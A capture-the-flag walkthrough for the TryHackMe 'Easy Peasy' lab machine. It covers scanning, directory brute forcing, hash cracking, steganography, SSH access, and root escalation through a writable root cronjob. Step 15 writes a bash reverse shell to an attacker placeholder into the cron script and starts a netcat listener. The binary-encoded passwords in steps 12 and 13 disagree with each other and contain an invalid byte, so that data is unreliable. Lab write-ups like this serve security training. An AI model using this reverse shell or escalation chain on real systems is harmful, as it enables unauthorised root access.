TryHackMe: Easy Peasy

Introduction

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

---

Procedure

1. Full Port Scanning

We start by identifying all open ports on the target machine:

nmap -p- --open -T4 --min-rate 5000 IP

Output:

PORT      STATE SERVICE
80/tcp    open  http
6498/tcp  open  unknown
65524/tcp open  unknown

2. Detailed Service Fingerprinting

We perform banner grabbing and default script execution on the discovered ports:

nmap -p 80,6498,65524 -sC -sV IP

Output:

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3. Web Directory Brute Forcing (Port 80)

We scan the main web server on port 80 for hidden directories using Gobuster:

gobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50

Output:

hidden               (Status: 301) [Size: 169] [--> http://IP/hidden/]

4. Exploring /hidden/

Inspecting the source code of http://IP/hidden/ reveals a static placeholder page. We proceed by running directory enumeration inside /hidden/:

gobuster dir -u http://IP/hidden/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50

Output:

whatever             (Status: 301) [Size: 169] [--> http://IP/hidden/whatever/]

5. Exploring /hidden/whatever/

Inspecting the source code of http://IP/hidden/whatever/ reveals a hidden base64 string:

<p hidden>spoiler{ZmxhZ3tmMXJzN19mbDRnfQ==}</p>

6. Decoding the Hidden Parameter (First Flag)

We decode the base64-encoded string found inside the hidden paragraph to retrieve the first flag:

echo "spoiler{ZmxhZ3tmMXJzN19mbDRnfQ==}" | base64 -d

Output:

flag{f1rs7_fl4g}

7. Scanning Port 65524 for Files

Now, we perform directory fuzzing with extensions on the web server running on port 65524:

gobuster dir -u http://IP:65524/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50 -x php,txt,html,xml,bak

Output:

index.html           (Status: 200) [Size: 10818]
robots.txt           (Status: 200) [Size: 153]

8. Decoding Robots.txt MD5 Hash (Second Flag)

Reading the contents of http://IP:65524/robots.txt:

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:spoiler{a18672860d0510e5ab6699730763b250}
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

We analyze the User-Agent hash to identify the hash type:

hashid spoiler{a18672860d0510e5ab6699730763b250}

Identification output:

Analyzing 'spoiler{a18672860d0510e5ab6699730763b250}'
[+] MD5
[+] MD4
[+] Double MD5

Identifying it as an MD5 hash, we decrypt it using an online decryption tool (such as MD5 Center) to obtain the second flag of the machine:

spoiler{a18672860d0510e5ab6699730763b250} -> flag{1m_s3c0nd_fl4g}

9. Finding Flag 3 inside Apache Source Code

Inspecting the source code of http://IP:65524/index.html reveals the third flag hidden inside a comment:

They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
*-available/ counterparts. These should be managed
by using our helpers

10. Locating the Next Hidden Directory (Base62)

Further down in the source code of http://IP:65524/index.html, we find another hidden comment:

<p hidden>its encoded with ba....:spoiler{ObsJmP173N2X6dOrAgEAL0Vu}</p>

We can decode this Base62 string using a Python script:

python3 -c "import base62; print(base62.decodebytes('spoiler{ObsJmP173N2X6dOrAgEAL0Vu}').decode('utf-8'))"

Output:

/n0th1ng3ls3m4tt3r

11. Cracking the GOST Hash

Visiting http://IP:65524/n0th1ng3ls3m4tt3r/ reveals the following hash:

spoiler{940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81}

We analyze it with hashid and find it is compatible with the GOST R 34.11-94 algorithm. Using John the Ripper alongside the wordlist supplied by the machine, we crack the hash:

john --format=gost --wordlist=easypeasy_wordlist.txt hash.txt

Cracked password:

spoiler{mypasswordforthatjob}

12. Extracting Steganographic Data

The directory /n0th1ng3ls3m4tt3r/ hosts an image named binarycodepixabay.jpg. We download the image and use steghide with the cracked passphrase spoiler{mypasswordforthatjob} to extract hidden contents:

steghide extract -sf binarycodepixabay.jpg

Output file secrettext.txt contents:

username:boring
password:
spoiler{01101001 01100011 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110015 01110011 01110111 01101111 01110010 01100100 01110100 01100100 01101001 01101110 01100001 01110010 01111001}

Note: The binary string translates to SSH Password.

13. Decoding Binary to Text (SSH Password)

We convert the binary string to text:

for i in spoiler{01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110015 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001}; do printf "\x$(printf %x $((2#$i)))"; done; echo

Output:

spoiler{iconvertedmypasswordtobinary}

14. Initial SSH Access (User Flag)

We log in via SSH using the credentials boring / spoiler{iconvertedmypasswordtobinary} on the custom port 6498:

ssh boring@IP -p 6498

Listing files reveals user.txt containing a ROT13 cipher string:

spoiler{synt{a0jvgf33zfa0ez4y}}

We decode it to get the user flag:

echo "spoiler{synt{a0jvgf33zfa0ez4y}}" | tr 'a-zA-Z' 'n-za-mN-ZA-M'

Decoded User Flag:

flag{n0wits33msn0rm4l}

15. Privilege Escalation (Root Flag)

We inspect the system cronjobs:

cat /etc/crontab

Discovered root cronjob:

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

Checking permissions on .mysecretcronjob.sh:

ls -la /var/www/.mysecretcronjob.sh

Output:

-rwxr-xr-x 1 boring boring 33 Jun 14  2020 /var/www/.mysecretcronjob.sh

Since the cronjob runs as root and the script is owned/writable by boring, we can inject a reverse shell payload:

echo "bash -c 'bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1'" > /var/www/.mysecretcronjob.sh

On our local machine, we start a netcat listener:

nc -lvnp 4444

After a minute, the cronjob executes and we receive a root shell connection. We check our active identity and retrieve the final root flag:

whoami
# root

cat /root/.root.txt

Root Flag:

flag{63a9f0ea7bb98050796b649e85481845}